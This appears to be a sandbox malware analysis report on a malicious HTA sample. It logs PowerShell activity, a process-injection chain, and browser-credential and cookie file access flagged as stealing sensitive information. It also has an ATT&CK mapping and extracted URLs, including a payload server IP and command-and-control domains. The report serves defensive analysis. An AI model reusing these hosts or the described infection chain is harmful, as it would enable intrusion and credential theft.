                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match; File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\SysWOW64\ieUnatt.exe; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                  Remote Access Functionality

                  Source: Yara match; File source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000E.00000002.4513400219.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000E.00000002.4513357875.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000B.00000002.2539781940.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000B.00000002.2529118172.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000B.00000002.2551487251.0000000001D70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000E.00000002.4512337424.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.4516216085.0000000006BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 0000000C.00000002.4513529587.0000000003B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                  Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                  Execution: 11 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 3 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
                  Persistence: 111 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                  Privilege Escalation: 412 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
                  Defense Evasion: 1 Masquerading; 31 Virtualization/Sandbox Evasion; 412 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 3 Obfuscated Files or Information; 1 DLL Side-Loading
                  Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                  Discovery: 121 Security Software Discovery; 2 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 114 System Information Discovery; Remote System Discovery
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                  Collection: 11 Email Collection; 1 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                  Command and Control: 1 Encrypted Channel; 4 Ingress Tool Transfer; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
                  [Figure: Behavior Graph ID: 1568883, Sample: maybecreatebesthingswithgre..., Startdate: 05/12/2024, Architecture: WINDOWS, Score: 100]
                  Process chain shown in the graph: mshta.exe -> cmd.exe -> powershell.exe -> wscript.exe -> powershell.exe -> aspnet_compiler.exe -> lSomfUdjbC.exe (injected) -> ieUnatt.exe

                  Source | Detection | Scanner | Label | Link
                  maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta | 18% | ReversingLabs | Script-WScript.Trojan.Asthma |
                  maybecreatebesthingswithgreatnicewhichgivenbreakingthingstobe.hta | 25% | Virustotal | | Browse
                  No Antivirus matches
                  No Antivirus matches
                  Source | Detection | Scanner | Label | Link
                  www.inastra.online | 0% | Virustotal | | Browse
                  www.tophcom.online | 1% | Virustotal | | Browse
                                                                                                        high
                                                                                                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://i1.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpglSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFMpowershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.2440544161.0000000005BC7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://www.inastra.online/Toyota_F1.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2FllSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      http://www.inastra.online/Opel_Astra.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXKXNi6iOlK82%2FlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: malware
                                                                                                                      unknown
                                                                                                                      https://www.ecosia.org/newtab/ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://172.245.123.3/784/verygreattrafficwithniceworkingskilltobegood.tIFapowershell.exe, 00000003.00000002.2196881592.000000000322D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://ac.ecosia.org/autocomplete?q=ieUnatt.exe, 0000000E.00000002.4515530171.0000000007AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.wofflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2lSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://libs.jshub.com/font-awesome/5.10.0-12/css/solid.min.csslSomfUdjbC.exe, 0000000C.00000002.4514859333.00000000059A6000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.0000000006006000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://172.245.123.3/784/verygrepowershell.exe, 00000003.00000002.2198089199.0000000005692000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                https://res.cloudinary.compowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgtpowershell.exe, 00000008.00000002.2440544161.0000000004CB7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://crl.micropowershell.exe, 00000003.00000002.2201238458.00000000079BF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2439851510.000000000324C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.wofflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2198089199.0000000005427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttflSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.inastra.online/__media__/js/trademark.php?d=inastra.online&type=nslSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            http://www.inastra.online/2019_Toyota_Land_Cruiser.cfm?fp=KxtlUTPhWB%2Fwpu6zuo7h6FGLFrhSVbAgHpvfpKEXlSomfUdjbC.exe, 0000000C.00000002.4514859333.0000000004B84000.00000004.80000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4513908190.00000000051E4000.00000004.10000000.00040000.00000000.sdmp, ieUnatt.exe, 0000000E.00000002.4515394768.0000000007760000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2822246027.000000002F364000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
